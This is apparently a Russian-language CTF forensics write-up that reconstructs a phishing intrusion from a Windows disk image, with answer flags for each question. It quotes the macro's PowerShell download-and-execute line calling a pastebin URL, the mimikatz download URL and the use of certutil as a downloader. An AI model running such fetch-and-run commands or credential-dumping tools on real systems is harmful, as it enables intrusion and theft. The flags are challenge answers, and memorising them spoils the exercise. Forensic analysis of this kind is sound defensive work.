3.9 KiB
3.9 KiB
Q1) Укажите версию установленного Microsoft Office
- Проверили файл
C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE. - Из PE‑ресурса
FileVersion/ProductVersionполучил версию.
Итог: caplag{12.0.4518.1014}
Q2) Определите начальный вектор атаки. Укажите почту, откуда пришел вирусный файл и название файла (с расширением). формат: email_filename
- В профиле Thunderbird открыли письмо:
C:\Users\PC31\AppData\Roaming\thunderbird\Profiles\g59pkejj.default-release\Mail\Local Folders\mail.eml. - В заголовках письма:
From: "HR Department" <hr@gdhwiXzuedhi.org>. - Во вложениях письма:
filename="shtatnoe-raspisanie.xlsm".
Итог: caplag{hr@gdhwiXzuedhi.org_shtatnoe-raspisanie.xlsm}
Q3) Укажите ссылку, которая использовалась для загрузки и запуска второй стадии атаки
- Открыли
C:\Users\PC31\Documents\shtatnoe-raspisanie.xlsm. olevbaпоказалWorkbook_Open, где строка дважды декодируется из base64.- После декодирования получен URL:
https://pastebin.com/raw/hz2rEByR, который передается вpowershell.exe -c IEX (New-Object Net.WebClient).DownloadString(...).
Итог: caplag{https://pastebin.com/raw/hz2rEByR}
Q4) Через Reverse shell хакер скачал еще один вредоносный файл для третей стадии атаки. Укажите URL
- Открыли кеш загрузок CryptoAPI:
C:\Users\PC31\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5E417CD142DEC44E17C581F01DB81204. - Внутри файла в UTF‑16LE хранится полный URL загрузки архива.
Итог: caplag{https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip}
Q5) Укажите полный путь к архиву где лежит mimikatz и название программы (c расширением) с помощью которой хакер скачал его. формат: Path_filename
- В
C:\Windows\Prefetch\CERTUTIL.EXE-79A712E5.pf(после распаковки MAM/LZXPRESS‑Huffman) в списке ссылок указаны файлы:C:\Users\PC31\AppData\Local\Temp\.settings.zipC:\Windows\SysWOW64\certutil.exe
- Это подтверждает, что архив с mimikatz сохранен как
.settings.zip, а скачивание выполненоcertutil.exe.
Итог: caplag{C:\Users\PC31\AppData\Local\Temp\.settings.zip_certutil.exe}
Q6) Укажите полную дату последнего запуска certutil.exe и кол-во запусков этой программы. формат: дд.мм.гггг/чч:мм:cc_count.
- В
C:\Windows\Prefetch\CERTUTIL.EXE-79A712E5.pfраспаковали MAM‑блок (LZXPRESS‑Huffman). - В распакованном файле:
last_run_time(FILETIME) находится по смещению0x80→2025‑06‑30 12:18:36Z(UTC).run_count(DWORD) по смещению0xC8→1.
- Перевод в локальное время (UTC+3) дает
30.06.2025 15:18:36.
Итог: caplag{30.06.2025/15:18:36_1}
Q7) Укажите сайт который пользователь посетил больше всего
- История браузера пользователя находится в Edge:
C:\Users\PC31\AppData\Local\Microsoft\Edge\User Data\Default\History. - В SQLite‑таблице
urlsмаксимальныйvisit_countу страниц доменаunisender.com.
Итог: caplag{https://www.unisender.com}